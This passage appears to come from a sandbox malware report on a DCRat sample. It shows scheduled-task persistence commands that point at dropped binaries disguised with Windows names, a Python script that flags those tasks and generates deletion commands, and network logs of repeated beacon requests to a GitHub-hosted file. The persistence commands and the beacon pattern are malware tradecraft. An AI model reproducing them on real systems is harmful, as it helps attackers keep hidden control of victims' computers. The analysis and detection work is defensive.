                                                schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\sihost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3508
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\Windows\de-DE\SppExtComObj.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:860
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\de-DE\SppExtComObj.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4396
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Windows\de-DE\SppExtComObj.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4828
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\providercommon\SearchApp.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2980
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\providercommon\SearchApp.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4888
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\providercommon\SearchApp.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1360
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Templates\RuntimeBroker.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2564
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Templates\RuntimeBroker.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4928
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Templates\RuntimeBroker.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1300
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\unsecapp.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2796
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\unsecapp.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2396
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Users\Public\AccountPictures\unsecapp.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1468
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\Registry.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1832
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3180
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3416
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\debug\dllhost.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2476
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\debug\dllhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4476
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\debug\dllhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2556
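Every schtasks.exe line above follows one template per dropped file: a task named after the file that fires ONLOGON with /rl HIGHEST, plus two tasks named after the file with its first letter repeated (smss/smsss, conhost/conhostc, Registry/RegistryR) that re-run it every few minutes, one of them also at HIGHEST. The script below is an added example and is not part of the tria.ge report or of DCRat; it parses command lines of that shape, flags targets that borrow a Windows binary name from a directory Windows never installs it in, groups the hits per dropped file, and prints the matching cleanup commands. SAMPLE_CMDLINES are copied from the report plus one constructed benign line; SYSTEM_BINARIES and TRUSTED_PREFIXES are this example's assumptions.

```python
"""Triage the schtasks.exe command lines from the process tree above.

Added example, not part of the tria.ge report or of DCRat. Parses each
`schtasks /create`, flags targets that borrow a Windows binary name from a
directory Windows never installs it in, groups hits per dropped file and
emits matching `schtasks /delete` lines. SAMPLE_CMDLINES come from the report
(plus one constructed benign line); SYSTEM_BINARIES and TRUSTED_PREFIXES are
this example's assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

SAMPLE_CMDLINES = [
    r"""schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\providercommon\SppExtComObj.exe'" /f""",
    r"""schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\providercommon\SppExtComObj.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\providercommon\SppExtComObj.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\smss.exe'" /f""",
    r"""schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\smss.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\smss.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\debug\dllhost.exe'" /rl HIGHEST /f""",
    # Constructed benign line (assumption): an ordinary admin task that must not be flagged.
    r"""schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Backup\backup.exe" /f""",
]
# Assumption: Windows' own binary names, and the only directory prefixes a genuine copy lives under.
SYSTEM_BINARIES = {"smss.exe", "conhost.exe", "winlogon.exe", "dllhost.exe", "sihost.exe",
                   "fontdrvhost.exe", "runtimebroker.exe", "searchapp.exe", "sppextcomobj.exe",
                   "textinputhost.exe", "unsecapp.exe", "registry.exe"}
TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\systemapps\\")
_FLAGS = {"name": re.compile(r'/tn\s+"([^"]+)"', re.I), "schedule": re.compile(r"/sc\s+(\S+)", re.I),
          "modifier": re.compile(r"/mo\s+(\d+)", re.I), "target": re.compile(r'/tr\s+"([^"]+)"', re.I),
          "run_level": re.compile(r"/rl\s+(\S+)", re.I)}


@dataclass
class TaskCreate:
    name: str
    schedule: str
    modifier: Optional[int]   # /mo value (minutes here), None for ONLOGON/DAILY
    target: str               # on-disk path with DCRat's "'...'" double quoting removed
    run_level: Optional[str]  # "HIGHEST" when /rl HIGHEST was given

    @property
    def basename(self) -> str:
        return self.target.rsplit("\\", 1)[-1].lower()

    @property
    def directory(self) -> str:
        return self.target.rsplit("\\", 1)[0].lower() + "\\"


def parse_create(cmdline: str) -> Optional[TaskCreate]:
    """Return the parsed task, or None when the line is not a `schtasks /create`."""
    if not re.search(r"\bschtasks(\.exe)?\s+/create\b", cmdline, re.I):
        return None

    def grab(key: str) -> Optional[str]:
        m = _FLAGS[key].search(cmdline)
        return m.group(1) if m else None

    name, target, mod = grab("name"), grab("target"), grab("modifier")
    if name is None or target is None:
        return None
    return TaskCreate(name=name, schedule=(grab("schedule") or "").upper(),
                      modifier=int(mod) if mod else None,
                      target=target.strip().strip("'\""),
                      run_level=(grab("run_level") or "").upper() or None)


def is_masquerading(task: TaskCreate) -> bool:
    """True when the target reuses a Windows binary name from an untrusted directory."""
    return task.basename in SYSTEM_BINARIES and not task.directory.startswith(TRUSTED_PREFIXES)


def dcrat_name_pattern(task: TaskCreate) -> bool:
    """DCRat names the ONLOGON task after the file and the MINUTE tasks after the file
    plus its first letter repeated (smss -> smsss, conhost -> conhostc)."""
    stem = task.basename[:-4] if task.basename.endswith(".exe") else task.basename
    return task.name.lower() in (stem, stem + stem[0])


def triage(cmdlines: List[str]) -> Dict[str, List[TaskCreate]]:
    """Parse every line, keep the masquerading tasks, group them by dropped file."""
    by_target: Dict[str, List[TaskCreate]] = defaultdict(list)
    for line in cmdlines:
        task = parse_create(line)
        if task and is_masquerading(task):
            by_target[task.target].append(task)
    return dict(by_target)


def cleanup_commands(by_target: Dict[str, List[TaskCreate]]) -> List[str]:
    """One `schtasks /delete` per distinct task name; run these before removing the files."""
    names = sorted({t.name for tasks in by_target.values() for t in tasks})
    return [f'schtasks.exe /delete /tn "{n}" /f' for n in names]


if __name__ == "__main__":
    flagged = triage(SAMPLE_CMDLINES)
    for target, tasks in flagged.items():
        print(target, "(DCRat naming)" if all(map(dcrat_name_pattern, tasks)) else "")
        for t in tasks:
            when = f" every {t.modifier} min" if t.modifier else ""
            print(f"   {t.name}: {t.schedule}{when}" + (f" ({t.run_level})" if t.run_level else ""))
    print("\n".join(cleanup_commands(flagged)))
```

Feed it Sysmon event 1 or Security 4688 command lines instead of SAMPLE_CMDLINES to hunt for the same pattern on a fleet. TRUSTED_PREFIXES is deliberately narrow, so a genuine copy in an unusual but valid location (a mounted image, a second Windows install) is also reported and needs a manual look; the task names and the repeated-first-letter habit are what tie a hit to DCRat rather than to some other dropper.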

                                              Network

                                              • flag-us
                                                DNS
                                                133.211.185.52.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                133.211.185.52.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                DNS
                                                85.49.80.91.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                85.49.80.91.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                DNS
                                                73.159.190.20.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                73.159.190.20.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                DNS
                                                95.221.229.192.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                95.221.229.192.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                DNS
                                                raw.githubusercontent.com
                                                conhost.exe
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                raw.githubusercontent.com
                                                IN A
                                                Response
                                                raw.githubusercontent.com
                                                IN A
                                                185.199.109.133
                                                raw.githubusercontent.com
                                                IN A
                                                185.199.111.133
                                                raw.githubusercontent.com
                                                IN A
                                                185.199.110.133
                                                raw.githubusercontent.com
                                                IN A
                                                185.199.108.133
• GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt (conhost.exe)
  Remote address: 185.199.109.133:443
  Request
    GET /justbio123/raven/main/api.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
  Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 4
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
    Accept-Ranges: bytes
    Date: Sat, 21 Dec 2024 21:17:00 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600070-LCY
    X-Cache: HIT
    X-Cache-Hits: 2
    X-Timer: S1734815821.963868,VS0,VE0
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 91c799b9d11f94390a39bccc2013ea0024b707f3
    Expires: Sat, 21 Dec 2024 21:22:00 GMT
    Source-Age: 276
• DNS 133.109.199.185.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    133.109.199.185.in-addr.arpa IN PTR
  Response
    133.109.199.185.in-addr.arpa IN PTR cdn-185-199-109-133.github.com
• GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt (conhost.exe)
  Remote address: 185.199.109.133:443
  Request
    GET /justbio123/raven/main/api.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
  Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 4
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
    Accept-Ranges: bytes
    Date: Sat, 21 Dec 2024 21:17:15 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lon4259-LON
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1734815835.374251,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: dc313ab60f343ad6dcfc00b73093752565b9e0bf
    Expires: Sat, 21 Dec 2024 21:22:15 GMT
    Source-Age: 297
• DNS 50.23.12.20.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    50.23.12.20.in-addr.arpa IN PTR
  Response
• DNS 13.86.106.20.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    13.86.106.20.in-addr.arpa IN PTR
  Response
• DNS 15.164.165.52.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    15.164.165.52.in-addr.arpa IN PTR
  Response
• DNS 92.12.20.2.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    92.12.20.2.in-addr.arpa IN PTR
  Response
    92.12.20.2.in-addr.arpa IN PTR a2-20-12-92.deploy.static.akamaitechnologies.com
• GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt (conhost.exe)
  Remote address: 185.199.109.133:443
  Request
    GET /justbio123/raven/main/api.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
  Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 4
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
    Accept-Ranges: bytes
    Date: Sat, 21 Dec 2024 21:17:31 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lon4254-LON
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1734815851.918969,VS0,VE122
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 6959e4972632308322ff4e4449dd0c12d9885f92
    Expires: Sat, 21 Dec 2024 21:22:31 GMT
    Source-Age: 0
• GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt (conhost.exe)
  Remote address: 185.199.109.133:443
  Request
    GET /justbio123/raven/main/api.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
  Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 4
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
    Accept-Ranges: bytes
    Date: Sat, 21 Dec 2024 21:17:46 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lon420111-LON
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1734815867.621122,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: a6ffde2d43767baaa49d9090804b16ee68aba752
    Expires: Sat, 21 Dec 2024 21:22:46 GMT
    Source-Age: 16
• GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt (conhost.exe)
  Remote address: 185.199.109.133:443
  Request
    GET /justbio123/raven/main/api.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
  Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 4
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
    Accept-Ranges: bytes
    Date: Sat, 21 Dec 2024 21:17:58 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600084-LCY
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1734815878.427685,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: eeec38c1f9bfc638035b5ece53845bee36448fbd
    Expires: Sat, 21 Dec 2024 21:22:58 GMT
    Source-Age: 2
• GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt (conhost.exe)
  Remote address: 185.199.109.133:443
  Request
    GET /justbio123/raven/main/api.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
  Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 4
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
    Accept-Ranges: bytes
    Date: Sat, 21 Dec 2024 21:18:12 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600082-LCY
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1734815893.809547,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 1fbbce0ad053d792e9f33acb0fdc59e41a79e765
    Expires: Sat, 21 Dec 2024 21:23:12 GMT
    Source-Age: 16
• GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt (conhost.exe)
  Remote address: 185.199.109.133:443
  Request
    GET /justbio123/raven/main/api.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
  Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 4
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
    Accept-Ranges: bytes
    Date: Sat, 21 Dec 2024 21:18:20 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lon420105-LON
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1734815900.336205,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 57602a465e8e9c615375b9b7d4289fa8dab4f08a
    Expires: Sat, 21 Dec 2024 21:23:20 GMT
    Source-Age: 49
• DNS 23.236.111.52.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    23.236.111.52.in-addr.arpa IN PTR
  Response
• GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt (conhost.exe)
  Remote address: 185.199.109.133:443
  Request
    GET /justbio123/raven/main/api.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
  Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 4
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
    Accept-Ranges: bytes
    Date: Sat, 21 Dec 2024 21:18:27 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600020-LCY
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1734815908.606938,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: ecf62415131290bf7029bce95c9a5442a9b3caa0
    Expires: Sat, 21 Dec 2024 21:23:27 GMT
    Source-Age: 31
• GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt (conhost.exe)
  Remote address: 185.199.109.133:443
  Request
    GET /justbio123/raven/main/api.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
  Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 4
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
    Accept-Ranges: bytes
    Date: Sat, 21 Dec 2024 21:18:38 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600099-LCY
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1734815919.891393,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 3c062b343997e5d20a556d8edc4b7f2c9a2df2c6
    Expires: Sat, 21 Dec 2024 21:23:38 GMT
    Source-Age: 42
• GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt (conhost.exe)
  Remote address: 185.199.109.133:443
  Request
    GET /justbio123/raven/main/api.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
  Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 4
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
    Accept-Ranges: bytes
    Date: Sat, 21 Dec 2024 21:18:53 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600093-LCY
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1734815933.361147,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 5cb80583d773a9accf344696b0cb3099df6cfdc4
    Expires: Sat, 21 Dec 2024 21:23:53 GMT
    Source-Age: 57
                                              •
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:19:04 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lcy-eglc8600081-LCY
                                                X-Cache: HIT
                                                X-Cache-Hits: 2
                                                X-Timer: S1734815944.200748,VS0,VE0
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 3d828d91f7635c37165749bcf2b127d334f21fa4
                                                Expires: Sat, 21 Dec 2024 21:24:04 GMT
